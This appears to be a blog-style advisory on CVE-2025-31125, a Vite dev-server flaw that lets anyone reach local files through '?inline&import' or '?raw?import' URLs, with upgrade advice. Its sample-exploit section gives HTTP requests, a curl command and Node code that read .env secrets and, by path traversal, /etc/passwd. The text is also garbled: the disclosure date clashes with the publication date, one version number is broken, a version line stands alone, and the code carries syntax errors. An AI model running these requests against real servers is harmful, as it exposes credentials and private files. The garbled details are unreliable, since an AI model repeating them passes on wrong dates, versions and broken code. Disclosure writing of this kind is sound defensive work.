CVE-2025-31125 - Vite Leaks Local Files via ?inline&import or ?raw?import
On June 10, 2024, a new vulnerability, CVE-2025-31125, was disclosed affecting Vite, a modern build tool for JavaScript projects. This issue allows attackers to request local files from the Vite dev server using specific URL parameters. If your Vite server is exposed to the internet (using --host or server.host settings), your project files—and possibly sensitive data—could be at risk.
Vite patched this in versions 6.2.4, 6.1.3, 6..13, 5.4.16, and 4.5.11. If you're on an older version, you need to upgrade immediately.
Let's break down how this vulnerability works, see real code, and learn how to keep your projects safe.
What Is the Problem? (The Vulnerability)
Usually, Vite only serves files intended for your frontend app during development. But a flaw in the dev server allows users to fetch files outside the intended set—anything readable on the local system—by adding ?inline&import or ?raw?import to a request.
This is called a "Local File Disclosure". Anyone who can access your dev server can ask for files like your environment variables, private config, or source code—even files you never meant to share.
Who Is Affected?
- Only dev servers explicitly exposed to the network (using Vite's --host CLI flag, or the server.host config) are at risk.
Let’s say you’re running a Vite server with this command
vite --host
Or your vite.config.js looks like
export default {
server: {
host: '...',
port: 5173
}
}
Normally, only index.html, src/App.vue, etc., are served. But with this bug, a user could see any file like so:
http://your-server-ip:5173/.env?inline&import
http://your-server-ip:5173/package.json?raw?import
http://your-server-ip:5173/../../secret.txt?inline&import
If your dev server is on a public IP, an attacker just needs your address.
Sample Exploit
Suppose you're running Vite on a remote server with (unsafe) network exposure. An attacker can request:
GET /package.json?raw&import HTTP/1.1
Host: your-vite-server:5173
You'd see the full text of your package.json file in the browser.
Or, leak secrets
GET /.env?inline&import HTTP/1.1
Host: your-vite-server:5173
Even worse, path traversal with ../ was possible in some cases, e.g.
GET /../../etc/passwd?inline&import HTTP/1.1
Host: your-vite-server:5173
Here’s a simple curl command that demonstrates this bug (before patch)
# Replace <your-vite-server-ip> and file path
curl "http://<your-vite-server-ip>:5173/.env?inline&import";
Or, in JavaScript (Node)
const http = require('http');
http.get('http://your-vite-server:5173/.env?inline&import';, res => {
let data = '';
res.on('data', chunk => data += chunk);
res.on('end', () => console.log(data));
});
4.5.11
Never ever expose your dev server to the open internet unless you know exactly what you’re doing.
Example upgrade (if you use npm)
npm install vite@latest
Or pick the right version
npm install vite@6.2.4
Double-check your vite.config.js to make sure server.host never says '...' or your IP unless you 100% must—and then put it behind authentication or a firewall.
References
- CVE-2025-31125 at NIST NVD
- Vite release notes (GitHub)
- Discussion on the disclosure (GitHub issue)
- Vite Documentation
Quick Recap
- CVE-2025-31125 lets people fetch any file via Vite dev server using ?inline&import or ?raw?import.
Don’t run Vite dev servers on open networks.
Stay safe, and always keep your dependencies up-to-date!
Timeline
Published on: 03/31/2025 17:15:43 UTC
Last modified on: 04/01/2025 20:26:22 UTC